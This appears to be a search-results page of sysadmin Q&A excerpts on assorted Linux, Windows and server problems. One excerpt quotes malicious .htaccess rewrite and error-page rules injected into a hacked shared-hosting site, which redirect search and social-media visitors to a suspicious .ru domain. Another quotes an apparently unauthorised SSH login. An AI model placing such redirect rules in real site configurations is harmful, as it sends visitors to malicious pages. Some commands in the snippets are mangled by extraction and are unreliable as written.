Search Results

Search found 20946 results on 838 pages for 'at command'.

Page 717/838 | < Previous Page | 713 714 715 716 717 718 719 720 721 722 723 724  | Next Page >

  • Hearing a clicking noise from soundcard all the time

    - by Mehrdad
    I have installed Fedora 17 on my laptop. A few days ago I updated my fedora (but not upgraded). I shut down my computer and since the next time I turned it on I am hearing a clicking noise all the time from speakers. Even when I plug my headphones in I hear the noise through the headphone. I surfed over the internet and found the following shell commands: su -c 'echo "options snd_hda_intel power_save=0" /etc/modprobe.d/snd_hda_intel.conf' su -c 'echo 0 /sys/module/snd_hda_intel/parameters/power_save' I tried them but they didn't work. Here is the part of "lspci" command related to my sound-card: 00:1b.0 Audio device: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) High Definition Audio Controller (rev 03) I have to add that my sound-card is working and I can play some audio file, I mean I can hear the voice and noise simultaneously. But everything is OK in windows xp which is also installed on my laptop. Could it be related to the sound-card driver? If so, how can I revert it to the previous version?

    Read the article

  • Starting programs from terminal then exiting terminal exits started programs?

    - by sherrellbc
    I really was unsure how to phrase the question title. What I mean is that when I use the terminal to start a program, most of the time when the terminal is closed it also exits the programs started from it. Now this makes sense if we look at it from a hierarchical standpoint of the terminal being the parent process which spawns child processes, and any halt of the parent causes subsequent halting of the children as well. However, I've noticed this to not always be the case. For example, I downloaded Sublime Text Editor and created a symlink in PATH. I can start this program by issuing a sublime command from the terminal, but subsequent closure of the terminal program does nothing to sublime. However, other times either the child process that was started it also closed or it hangs up and causes problems. tl;dr: Is it always the case that programs started from a closed parent process will be closed when the parent is exited? And if so, is there way to start a program from the terminal and then close the terminal without exiting the started process? The whole point here is to start programs from the terminal so I do not overly-populate my desktop with symlinks.

    Read the article

  • Strange ssh login

    - by Hikaru
    I am running debian server and i have received a strange email warning about ssh login It says, that user mail logged in using ssh from remote address: Environment info: USER=mail SSH_CLIENT=92.46.127.173 40814 22 MAIL=/var/mail/mail HOME=/var/mail SSH_TTY=/dev/pts/7 LOGNAME=mail TERM=xterm PATH=/usr/local/bin:/usr/bin:/bin:/usr/bin/X11:/usr/games LANG=en_US.UTF-8 SHELL=/bin/sh KRB5CCNAME=FILE:/tmp/krb5cc_8 PWD=/var/mail SSH_CONNECTION=92.46.127.173 40814 my-ip-here 22 I looked in /etc/shadow and find out, that password for is not set mail:*:15316:0:99999:7::: I found this lines for login in auth.log n 3 02:57:09 gw sshd[2090]: pam_winbind(sshd:auth): getting password (0x00000388) Jun 3 02:57:09 gw sshd[2090]: pam_winbind(sshd:auth): pam_get_item returned a password Jun 3 02:57:09 gw sshd[2091]: pam_winbind(sshd:auth): user 'mail' granted access Jun 3 02:57:09 gw sshd[2091]: Accepted password for mail from 92.46.127.173 port 45194 ssh2 Jun 3 02:57:09 gw sshd[2091]: pam_unix(sshd:session): session opened for user mail by (uid=0) Jun 3 02:57:10 gw CRON[2051]: pam_unix(cron:session): session closed for user root and lots of auth failures for this user. There is no lines with COMMAND string for this user. Nothing was found with "rkhunter" and with "ps aux" process inspection, also there is no suspicious connections was found with "netstat" (as I can see) Can anyone tell me how it is possible and what else should be done? Thanks in advance.

    Read the article

  • What can be a reason for phpMyAdmin login to be not working (not at all, no reaction on submit)?

    - by Ivan
    When I open "http://localhost/phpmyadmin/", enter "root" as the user name and my MySQL root password and press go, then if I was using Firefox, I was getting offered to download index.php file (of a zero length), if I was using Opera 11, it said "Connection closed by remote server". Following recommendations I've removed all packages related to phpMyAdmin, PHP, MySQL and Apache and then reinstalled them step-by step (instead of just issuing apt-get install phpmyadmin and relying on the system to install the whole LAMP stack via dependencies as I've done before). The only change I've got was Firefox to stop offering to download index.php - now when I press Ok to submit my password, it just doesn't show any visible reaction at all. What may the reason be and how to fix it? I use up-to-date Xubuntu 11.04. Reinstalling the whole LAMP stack and phpMyAdmin did not help, neither did removing AppArmor. I've tried to use SQLBuddy instead, but there's exactly the same problem. So, I think, the problem is not in phpMyAdmin but in MySQL, Apache or something. MySQL seems to work if I use command line to access it. Apache & PHP seems to work also, as the login page of phpMyAdmin displays correctly.

    Read the article

  • Using Windows Explorer, how to find file names starting with a dot (period), in 7 or Vista?

    - by Chris W. Rea
    I've got a MacBook laptop in the house, and when Mac OS X copies files over the network, it often brings along hidden "dot-files" with it. For instance, if I copy "SomeUtility.zip", there will also be copied a hidden ".SomeUtility.zip" file. I consider these OS X dot-files as useless turds of data as far as the rest of my network is concerned, and don't want to leave them on my Windows file server. Let's assume these dot-files will continue to happen. i.e. Think of the issue of getting OS X to stop creating those files, in the first place, to be another question altogether. Rather: How can I use Windows Explorer to find files that begin with a dot / period? I'd like to periodically search my file server and blow them away. I tried searching for files matching ".*" but that yielded – and not unexpectedly – all files and folders. Is there a way to enter more specific search criteria when searching in Windows Explorer? I'm referring to the search box that appears in the upper-right corner of an Explorer window. Please tell me there is a way to escape my query to do what I want? (Failing that, I know I can map a drive letter and drop into a cygwin prompt and use the UNIX 'find' command, but I'd prefer a shiny easy way.)

    Read the article

  • shared hosting with malware, .htaccess file gets modified every 2 hours or so

    - by apache
    I spent all day today chasing malware on the shared hosting for one of my clients. The issue is as follows: Every 2 hours or so .htaccess file and all other .htaccess files gets modified, on the top of the file these lines are added: IfModule mod_rewrite.c> RewriteEngine On RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|youtube|wikipedia|excite|altavista|msn|aol|goto|infoseek|lycos|search|bing|dogpile|facebook|twitter|live|myspace|linkedin|flickr)\.(.*) RewriteRule ^(.*)$ http://pasla-ghwoo.ru/rqpgfap?8 [R=301,L] </IfModule> and on the bottom: ErrorDocument 400 http://pasla-ghwoo.ru/rqpgfap?8 ErrorDocument 401 http://pasla-ghwoo.ru/rqpgfap?8 ErrorDocument 403 http://pasla-ghwoo.ru/rqpgfap?8 ErrorDocument 404 http://pasla-ghwoo.ru/rqpgfap?8 ErrorDocument 500 http://pasla-ghwoo.ru/rqpgfap?8 The main problem I'm not root on the server, and cannot sudo, as this is shared hosting with 100's of websites. Typical good commands like dmesg, lsof, dtrace, chattr and many others are not available to me as I'm not root. I can't find who is modifying .htaccess files, how do I get that info? My guess is some php script is changing that which is called from outside via command and control. This seems to relate to this: http://blog.unmaskparasites.com/2009/09/11/dynamic-dns-and-botnet-of-zombie-web-servers/ How do I find out who is modifying .htaccess files without being root?

    Read the article

  • Chef bash resource not executing as specified user

    - by Arthur Maltson
    I'm writing a Chef cookbook to install Hubot. In the recipe, I do the following: bash "install hubot" do user hubot_user group hubot_group cwd install_dir code <<-EOH wget https://github.com/downloads/github/hubot/hubot-#{node['hubot']['version']}.tar.gz && \ tar xzvf hubot-#{node['hubot']['version']}.tar.gz && \ cd hubot && \ npm install EOH end However, when I try to run chef-client on the server installing the cookbook, I'm getting a permission denied writing to the directory of the user that runs chef-client, not the hubot user. For some reason, npm is trying to run under the wrong user, not the user specified in the bash resource. I am able to run sudo su - hubot -c "npm install /usr/local/hubot/hubot" manually, and this gets the result I want (installs hubot as the hubot user). However, it seems chef-client isn't executing the command as the hubot user. Below you'll find the chef-client execution. Thank you in advance. Saving to: `hubot-2.1.0.tar.gz' 0K ...... 100% 563K=0.01s 2012-01-23 12:32:55 (563 KB/s) - `hubot-2.1.0.tar.gz' saved [7115/7115] npm ERR! Could not create /home/<user-chef-client-uses>/.npm/log/1.2.0/package.tgz npm ERR! Failed creating the tarball. npm ERR! couldn't pack /tmp/npm-1327339976597/1327339976597-0.13104878342710435/contents/package to /home/<user-chef-client-uses>/.npm/log/1.2.0/package.tgz npm ERR! error installing [email protected] Error: EACCES, permission denied '/home/<user-chef-client-uses>/.npm/log' ... npm not ok ---- End output of "bash" "/tmp/chef-script20120123-25024-u9nps2-0" ---- Ran "bash" "/tmp/chef-script20120123-25024-u9nps2-0" returned 1

    Read the article

  • Having trouble with a workaround, for booting from a usb stick, using grub and a minimal linux kernel to load usb drivers

    - by s hanley
    I'm trying to boot from a usb stick. I formatted it to fat32, and later to ext2, and installed dsl on it using unetbootin, and later the usb install guide on dsl wiki (http://www.damnsmalllinux.org/wiki/index.php/Install_to_USB_From_within_Linux). The bios doesn't have a setting for booting from usb. Grub doesn't "see" the usb drive when I use the root and find commands, explained in (http://www.damnsmalllinux.org/wiki/index.php/USB_Booting). This happens even when I set boot from floppy at the top of the boot order. However, my usb keyboard is recognised by the bios and by grub. How can it recognise the keyboard but not the usb drive? Also, the usb led does flash even before grub starts up, so surely something must be happening usb-wise? I am now following an ubuntu guide to booting from a USB stick, using a hdd-based, minimal linux kernel to supply the usb drivers. But I'm having difficulty adapting it to other OSes (slax/dsl/aptosid). I believe I have to alter the initrd.gz file to include usb drivers and then copy that file along with vmlinuz to a partition on my hdd. But, what's the grub command for the kernel line supposed to look like? From the ubuntu example it's: title USB FLASH DRIVE root (hd0,6) kernel /boot/usb-boot/vmlinuz file=/cdrom/preseed/ubuntu.seed boot=casper noprompt cdrom-detect/try-usb=true persistent initrd /boot/usb-boot/initrd.lz boot Should mine just be: title USB FLASH DRIVE root (hd0,6) kernel /boot/usb-boot/vmlinuz cdrom-detect/try-usb=true initrd /boot/usb-boot/initrd.lz boot

    Read the article

  • Cannot write to directory after taking ownership

    - by jeff charles
    I had a directory on an internal hard-drive that was created in an old Windows 7 install. After re-installing my operating system, when I try to create a new directory inside that directory, I get an Access Denied message. This isn't a protected directory, just a random directory I created at the drive root (that drive was not the C drive in either install). I tried to take ownership by opening folder properties, going to the Security tab, clicking on Advanced, going to Owner tab, clicking on Edit, selecting my user account, checking Replace owner on subcontainers and objects, and clicking Apply. There were no error messages and I closed the dialogs. I rebooted, checked the owner on that folder and a couple subfolders and it appears to be set correctly. I am still getting an Access Denied message however when trying to create a directory in it. I've also tried using attrib -R . to remove any possible readonly attribute inside the directory in an admin command prompt but am still unable to create a directory using a non-admin prompt (it does work in an admin prompt). Is there anything I can do to get write access to that folder and it's subcontents in a non-elevated context without disabling UAC?

    Read the article

  • Enable bitlocker an save key to share

    - by user273694
    I have searched all over the web but cannot find a complete answer to this: How to enable Bitlocker on a laptop with TPM, and store a file with the Bitlocker recovery key and TPM password by USING THE manage-bde command line tool. The file should be the same as when created in the Bitlocker manager UI. I DO NOT want to save to AD. The same question was asked here but was not answered correctly. The goal is to write a script to be used with an endpoint manager. I have tried the following: manage-bde -on C: Works fine, but does not create or save a key. manage-bde -on C: -rk C:\myfolder\ and manage-bde -on C: -RecoveryKey C:\myfolder\ -rp The output from the last two methods state that a key has been saved to c:\myfolder and so on, but that is not the case. It also says that I have to: Save the password in a secure location Insert a USB flash drive with an external key file into the computer. Restart and run hardware test type "manage-bde -status" to check if the hardware test succeeded After a restart, I get an error saying that Bitlocker could not be enabled because the bitlocker startup key or recovery kpassword cannot be found on the USB device.... C: was not encrypted. Why am I asked to insert a USB?? I simply want to encrypt the hard drive and save the recovery information to a file automatically. Is that too much to ask? Help please!

    Read the article

  • Macports install of ack doesn't create correct executable

    - by user1664196
    I am trying to install p5-app-ack port from Mac Ports, but it seems it doesn't create a /opt/local/bin/ack binary at the end: $ sudo port search *app-ack Password: p5-app-ack @1.960.0 (perl) A grep replacement that ignores .svn/CVS/blib directories p5.8-app-ack @1.960.0 (perl) A grep replacement that ignores .svn/CVS/blib directories p5.10-app-ack @1.960.0 (perl) A grep replacement that ignores .svn/CVS/blib directories p5.12-app-ack @1.960.0 (perl) A grep replacement that ignores .svn/CVS/blib directories p5.14-app-ack @1.960.0 (perl) A grep replacement that ignores .svn/CVS/blib directories p5.16-app-ack @1.960.0 (perl) A grep replacement that ignores .svn/CVS/blib directories Found 6 ports. $ perl --version This is perl 5, version 12, subversion 4 (v5.12.4) built for darwin-thread-multi-2level Copyright 1987-2010, Larry Wall Perl may be copied only under the terms of either the Artistic License or the GNU General Public License, which may be found in the Perl 5 source kit. Complete documentation for Perl, including FAQ lists, should be found on this system using "man perl" or "perldoc perl". If you have access to the Internet, point your browser at http://www.perl.org/, the Perl Home Page. $ sudo port install p5-app-ack ---> Computing dependencies for p5-app-ack ---> Cleaning p5-app-ack ---> Updating database of binaries: 100.0% ---> Scanning binaries for linking errors: 35.0% ---> No broken files found. $ $ ls /opt/local/bin/ac* /opt/local/bin/ack-5.12 /opt/local/bin/aclocal /opt/local/bin/aclocal-1.12 /opt/local/bin/activation-client /opt/local/bin/acyclic $ which ack $ ack -bash: ack: command not found Update If I then try to install p5.12-app-ack afterwards, I get $ sudo port install p5.12-app-ack Password: ---> Computing dependencies for p5.12-app-ack ---> Cleaning p5.12-app-ack ---> Scanning binaries for linking errors: 100.0% ---> No broken files found. $

    Read the article

  • Ubuntu+Win7--disk error press any key to restart

    - by Siddharth
    Apparently,none of the solutions in any other posts and forums worked for me For some reasons I decided to remove ubuntu from my hard disk drive. My partition table(presently): (/dev/sda1) (fat32) 900 MiB ---(MBR,I suppose) (/dev/sda2) (ntfs) 70 GiB -----(Windows 7) (/dev/sda3) (ntfs) 314.88 GiB --(Personal File storage) (/dev/sda4) (ext4) 80 GiB -----(Ubuntu 13.04) (unallocated) -----1.31 MiB So,after moving(cut-paste) everything(for backup) from the fat32 partition using win7..I booted into Ubuntu and copied the remaining 3 files(hidden in Win7 file explorer) --bootmgr,bootsect.bak,and one more which I do not remember.TERRIBLE MISTAKE After this I again booted into Windows and deleted ext4 partition..formatted it to ntfs..and shut down the pc.Then,I put in a Win7 bootable USB..using command prompt I entered bootrec /fixmbr,and bootrec /fixboot.. Restarting showed me the GRUB..choosing windows 7 showed me "Disk Error. Press any key to restart." I also installed a fresh Win7 installation on the 80 GiB partition expecting a Windows Legacy Bootloader with two win7 options..but did not work. Then..I used a Ubuntu LiveUSB to put it back to the present configuration(above) since all methods to restore the MBR failed.. I copied back the fat32 partitions backup files but couldn't copy those 3 files.Somehow ,they had been recreated and were non-replaceable. I do not want to format the win7 partition for a fresh one. I have used boot-repair..Restore MBR option brings back to "Disk error...." without even going through grub..so I reinstalled grub and I'm able to boot into Ubuntu. grub menu shows the win7 option as "Windows 7 (loader) (on /dev/sda1)". paste.ubuntu.com/5753710 paste.ubuntu.com/5775999

    Read the article

  • Massive number of context switches on ksoftirqd

    - by Pace
    We have two servers that are grinding to a halt. One is a VM and the other is bare metal. Neither of them are running similar code but they are on the same network. It appears that an incredible number of context switches are arising from ksoftirqd (which is taking up a lot of CPU). vmstat output procs -----------memory---------- ---swap-- -----io---- -system-- -----cpu------ r b swpd free buff cache si so bi bo in cs us sy id wa st 1 0 0 605092 182496 2637556 0 0 0 0 4177 519187 8 19 73 0 0 2 0 0 605092 182496 2637556 0 0 0 0 4792 520980 8 19 74 0 0 3 0 0 605092 182496 2637552 0 0 0 0 2137 659640 18 26 56 0 0 ... pidstat output TCK4-BM-06A:~ # pidstat -w -I 5 Linux 2.6.32.12-0.7-default (TCK4-BM-06A) 07/02/2012 _x86_64_ 03:03:01 PM PID cswch/s nvcswch/s Command 03:03:06 PM 1 0.20 0.00 init 03:03:06 PM 4 386666.27 0.00 ksoftirqd/0 03:03:06 PM 6 0.60 0.00 ksoftirqd/1 03:03:06 PM 8 378213.17 0.00 ksoftirqd/2 03:03:06 PM 10 0.20 0.00 ksoftirqd/3 03:03:06 PM 12 0.20 0.00 ksoftirqd/4 03:03:06 PM 26 377115.37 0.00 ksoftirqd/11 03:03:06 PM 27 1.80 0.00 events/0 03:03:06 PM 28 1.00 0.00 events/1 03:03:06 PM 29 1.00 0.00 events/2 03:03:06 PM 30 1.00 0.00 events/3 03:03:06 PM 31 0.80 0.00 events/4 03:03:06 PM 32 0.80 0.00 events/5 ... My initial thought is that, since both are on the same network, something is flooding the network. Is this consistent with the data?

    Read the article

  • Moving a lot of small files between servers using rsync

    - by Adirael
    Hello guys, I'm moving a lot of files (about 2 millions) between two servers on different locations using rsync over ssh, it seems to work fine but I just realised I'm losing some files on the process. I got server 1, with the original data, and server 2, with the copy. Server 1 runs CentOS 5 and Server 2 runs on Ubuntu 10. I'm doing the transfer on the Server's 2 command line like this: rsync -e ssh -avzn usr@server1:/remote/path /local/path The first file movement I did using tar, but I didn't though of piping it through ssh and it failed cause the disk on server 1 was almost full, so I transfered it anyways (it was about 200GB) and got about 80% of the files. Then I piped another tar with the rest of the files (they're in folders, I got 100 folders with about 30 subfolders each, with files inside) and now I got everything on server 2. I wanted to be sure, so I my two options are getting the md5sum of all the files and check them or running an rsync on server 2 against server 1, that's what I did. It got some missing stuff and now it says there's nothing more to do (DRY RUN). But I got at least two files that are missing inside a subfolder. I ran that same rsync on that folder, but still dry run. Am I doing something wrong? Thanks, and sorry for the wall of text.

    Read the article

  • Can't remove zfs log device from pool

    - by netmano
    I run a FreeBSD 9.0 server with ZFS pool version 28 and ZFS version 5. I had two pools with a log on ssd's two partitions. These pools was created on FreeBSD 8.2 with ZFS pool version 15, and ZFS version 4. After I upgraded to the new zfs version, I tried to remove the SSD log device from both pools both command was successful (no error message). One of the pools was the log removed, but the other still there, I down the server removed the ssd physically, and hoped it will be forgot by the zpool. The zpool became degraded as ssd was missing. I tied to remove again. No error message, but the log device entry still there. After it, to became the pool online again, I created a file on the root UFS partition and replaced the missing to device to this file. It was successful, the pool again online. However I can't remove the log device from the pool. Where can I have to look for error messages? (in dmesg there is nothing about it, also the zfs remove doesn't have any error message, it's seem like it was successful.

    Read the article

  • Active Directory: Determining DN or OU from log in credentials [closed]

    - by Christopher Broome
    I'm updating a PHP login process to leverage active directory on a Windows server. The logging in process seems pretty straight forward via a "ldap_bind", but I also want to pull some profile information from the AD server (first name, last name, etc...) which seems to require a robust distinguished name (DN). When on the windows server I can grab this via 'dsquery user' on the command prompt, but is there a way to get the same value from just the user's login credentials in PHP? I want to avoid getting a list of hundreds of DNs when on-boarding clients and associating each with one of our users, so any means to programmatically determine this would be preferential. Otherwise, I'll know the domain and host for the request so I can at least set the DC portions of the DN, but the organizational units (OU) seem to be pretty important for querying data. If I can find some of the root level OU values associated with the user I can do a ldap_search and crawl. I browsed through the existing questions and found some similar but nothing that really addressed this, so my apologies if the obvious answer is out there. Thanks for the help.

    Read the article

  • Recent DDE / file open issue with Office 2007 affecting only a few machines, is a Windows Update to blame?

    - by kafka
    All our workstations run Windows 7 Professional 64 bit. It started with one, then another, then another couple of machines having a problem accessing Word files locally and on the network. This doesn't happen on my machine though. Affected users get the error message 'There was a problem sending the command to the program'. I've Googled for solutions, but none of the answers worked. They suggested deleting certain registry keys; unregistering and reregistering the program for DDE; resetting the way that the shell opens .docx programs etc. each to no avail. As it affects local and network shares I believe the problem lies with the clients, and not the server, and I'm starting to suspect that there could have been a recent Windows Update which has caused this. I've tried comparing the updates on my working machine with an affected machine, but I can't immediately see any major differences. Has anyone else recently encountered this problem? What are the best steps to take to further isolate what could be causing this?

    Read the article

  • Backing up a Windos 7 partition from Macbook with no OS X

    - by mattcodes
    I have a 3 year macbook with Windows 7 installed as 40gb and OS X as 40gb (80gb HD). I want to remove OS X as Im at the limit of 40gb on Windows and I have not logged on to Mac OS X since installed Win7 (dont flame me). So I want to delete OS X partition and expand my win partition to 80gb BUT I still would like to be able to regularly (once a week/month) backup my Windows 7 partition - its took a while to setup everything up right - not just docs and programs - so when the hard drive dies I want to be able to restore the partition and boot away, (the daily volatile bits I can pull down from dropbox and project from soure control). With Mac OS X I could use Winclone - and this worked flawless last time the HD failed with XP but with the absence of OS X I will need something else. Im thinking can I use a Linux Live boot CD along with an external USB hard drive. Boot from CD and then dd? the partition to the USB? What linux distro live CD should I use? I say dd as if I know what am taking about (I dont) is this the best way to backup a partition (when it will be restored to same hardware as bootable) ? What command?

    Read the article

  • postfix test and configuration problem

    - by Woho87
    Hi Guys! I installed postfix using sudo yum install postfix postfix-mysql. I'm newbie to mail systems, but I have one AMAZON EC2 instance with a public DNS. I used the public DNS in most cases, when I configured the file main.cf. The public DNS I have is from amazon and it is a long string(ec2-123-34-234-677.....amazon.com). // I configured this on main.cf. I replaced example.com with ec2-123-.......amazon.com myhostname = mail.example.com mydomain = example.com myorigin = $mydomain mydestination = example.com, $transport_maps local_recipient_maps = $alias_maps $virtual_mailbox_maps unix:passwd.byname home_mailbox = Maildir/ How do I test postfix? I just want it to send emails for my web application. I tried to test it with >telnet localhost 25 after I typed in SSH >sudo postfix start. but I recieve the message that telnet command can not be found. I also use the Amazon linux distribution if you want to know. I use it because it is free. What have I done wrong? Are there anymore configurations required pls help!

    Read the article

  • Use old raid drive as boot device without data loss

    - by Gabriel
    There were two disks in sw-raid. There were /dev/md1 as swap, /dev/md2 as boot and a /dev/md3 with ext4. The sw-raid was disabled by stopping and removing mdadm and then zeroing the superblock on each /dev/mdX partition with: sudo mdadm --zero-superblock /dev/sda1 sudo mdadm --zero-superblock /dev/sda2 sudo mdadm --zero-superblock /dev/sda3 In the disk that is the first boot device, I don't know if it's relevant, the system type of each partition was set back from fd to 82 or 83 with fdisk, /etc/fstab was updated, changing /dev/mdX to /dev/sdaX, and grub was reinstalled on the boot partition (/dev/sda2) with grub-instal. But the system wont boot. What else should I do to use this disk as the boot device without reinstall or data loss? Current output of fdisk Device Boot Start End Blocks Id System /dev/sda1 2048 33556480 16777216+ 82 Linux swap / Solaris /dev/sda2 * 33558528 34607104 524288+ 83 Linux /dev/sda3 34609152 3907027120 1936208984+ 83 Linux With it doesn't boot I mean that it stops in the grub console (with the grub> symbol). A ls command says: (hd0) (hd0,msdos3) (hd0,msdos2) (hd0,msdos1) (hd1) (hd1,msdos1) It's weird because hd1 was formatted with ext4...

    Read the article

  • Correct use of SMTP "Sender" header?

    - by Eric Rath
    Our web application sends email messages to people when someone posts new content. Both sender and recipient have opted into receiving email messages from our application. When preparing such a message, we set the following SMTP headers: FROM: [email protected] TO: [email protected] SENDER: [email protected] We chose to use the author's email address in the FROM header in an attempt to provide the best experience for the recipient; when they see the message in their mail client, the author is clear. To avoid the appearance of spoofing, we added the SENDER header (with our own company email address) to make it clear that we sent the message on the author's behalf. After reading RFCs 822 and 2822, this seems to be an intended use of the sender header. Most receiving mail servers seem to handle this well; the email message is delivered normally (assuming the recipient mailbox exists, is not over quota, etc). However, when sending a message FROM an address in a domain TO an address in the same domain, some receiving domains reject the messages with a response like: 571 incorrect IP - psmtp (in reply to RCPT TO command) I think this means the receiving server only saw that the FROM header address was in its own domain, and that the message originated from a server it didn't consider authorized to send messages for that domain. In other words, the receiving server ignored the SENDER header. We have a workaround in place: the webapp keeps a list of such domains that seem to ignore the SENDER header, and when the FROM and TO headers are both in such a domain, it sets the FROM header to our own email address instead. But this list requires maintenance. Is there a better way to achieve the desired experience? We'd like to be a "good citizen" of the net, and all parties involved -- senders and recipients -- want to participate and receive these messages. One alternative is to always use our company email address in the FROM header, and prepend the author's name/address to the subject, but this seems a little clumsy.

    Read the article

  • Exchange - inbound email only works from some servers

    - by Kryptonite
    I am having a problem where inbound mail from outside only works when sent from certain hosts. For example, when I send myself an email from my personal gmail account all is well, as the logs show: 2012-09-05 18:14:16 209.85.223.175 mail-ie0-f175.google.com SMTPSVC1 MAILSVR 192.168.1.79 0 EHLO 250 - - 2012-09-05 18:14:16 209.85.223.175 mail-ie0-f175.google.com SMTPSVC1 MAILSVR 192.168.1.79 0 STARTTLS 220 - - 2012-09-05 18:14:16 209.85.223.175 mail-ie0-f175.google.com SMTPSVC1 MAILSVR 192.168.1.79 0 STARTTLS 220 - - 2012-09-05 18:14:16 209.85.223.175 mail-ie0-f175.google.com SMTPSVC1 MAILSVR 192.168.1.79 0 EHLO 250 - - 2012-09-05 18:14:16 209.85.223.175 mail-ie0-f175.google.com SMTPSVC1 MAILSVR 192.168.1.79 0 MAIL 250 - - 2012-09-05 18:14:16 209.85.223.175 mail-ie0-f175.google.com SMTPSVC1 MAILSVR 192.168.1.79 0 RCPT 250 - - 2012-09-05 18:14:48 209.85.223.175 mail-ie0-f175.google.com SMTPSVC1 MAILSVR 192.168.1.79 0 QUIT 240 - - However, if I sent from my personal Yahoo account, I get this response: Sorry, we were unable to deliver your message to the following address. <[email protected]>: Remote host said: 530 5.7.0 Must issue a STARTTLS command first [MAIL_FROM] (NB: Nothing appeared in the smtp log for this message.) Any suggestions where to start looking? EDIT ---- I don't know if it matters, but the certificate I am using for TLS is self signed.

    Read the article

  • Extracting information from active directory

    - by Nop at NaDa
    I work in the IT support department of a branch of a huge company. I have to take care of a database with all the users, computers, etc. I'm trying to find a way to automatically update the database as much as possible, but the IT infrastructure guys doesn't give me enough privileges to use Active Directory in order to dump the users, nor they have the time to give me the information that I need. Some days ago I found Active Directory explorer from Sysinternals that allows me to browse through Active Directory, and I found all the information that I need there (username, real name, date when it was created, privileges, company, etc.). Unfortunately I'm unable to export the data to a human readable format. I'm just able to take a snapshot of the whole database in a machine-readable format. Doing the snapshot takes hours and I'm afraid that the infrastructure guys won't like me doing entire snapshots on a regular basis. Do you know of any tool (command-line is preferable) that would allow me to retrieve the values of the keys or export it to XML, CSV, etc?

    Read the article

  • Server-side SSH jump hosts

    - by Dan Sosedoff
    Trying to figure out server side SSH jump hosts logic. Current network schema: [Client] <--> [Server A: hostname: a.com] <--> [Server B] [Client] <--> [Server A: hostname: b.com] <--> [Server C] Server A responds to both DNS records. Possible flow: Client opens a ssh connection with ssh [email protected]. Server A accepts it and should automatically jump user onto Server B with ssh user2@server_b.com. Client opens a ssh connection with ssh [email protected]. Server A accepts it and should automatically just user onto Server C with ssh user2@server_c.com. In other words, client should be able to connect to the target without performing any local configuration, assuming that we have a stock ssh config. The problem with ssh jumps is that user has to define hosts in local ~/.ssh/config file, which is not acceptable in my case. It needs to be a default sshd behavior. Im aware that you can define a custom command ~/.ssh/authorized_keys on server, but i dont think there is a way to properly detect source hostname where user tries to connect. It is possible at all ?

    Read the article

  • GitHub - commit local changes in local branch to remote branch

    - by user62046
    I use Git Shell in Windows 7, working in a branch named Save-Rotation. Then I used git push origin Save-Rotation to commit the changes to remote. The result is posted at the end. It seems good. But when I went to my repository in GitHub site, which is https://github.com/chiapas/sumatrapdf/tree/Save-Rotation I can't see any change in the repository tree or commit tree. How can I know if the commit (to remote) is successful, and why the repository page is not updated? Here is the result in command-line C:\Users\imo\Documents\GitHub\sumatrapdf [Save-Rotation]> git push origin Save-R otation Counting objects: 167, done. Delta compression using up to 8 threads. Compressing objects: 100% (18/18), done. Writing objects: 100% (119/119), 27.43 KiB, done. Total 119 (delta 101), reused 119 (delta 101) To https://github.com/chiapas/sumatrapdf * [new branch] Save-Rotation -> Save-Rotation C:\Users\imo\Documents\GitHub\sumatrapdf [Save-Rotation +2 ~17 -0 !]> git push o rigin Save-Rotation Everything up-to-date C:\Users\imo\Documents\GitHub\sumatrapdf [Save-Rotation +2 ~17 -0 !]>

    Read the article

< Previous Page | 713 714 715 716 717 718 719 720 721 722 723 724  | Next Page >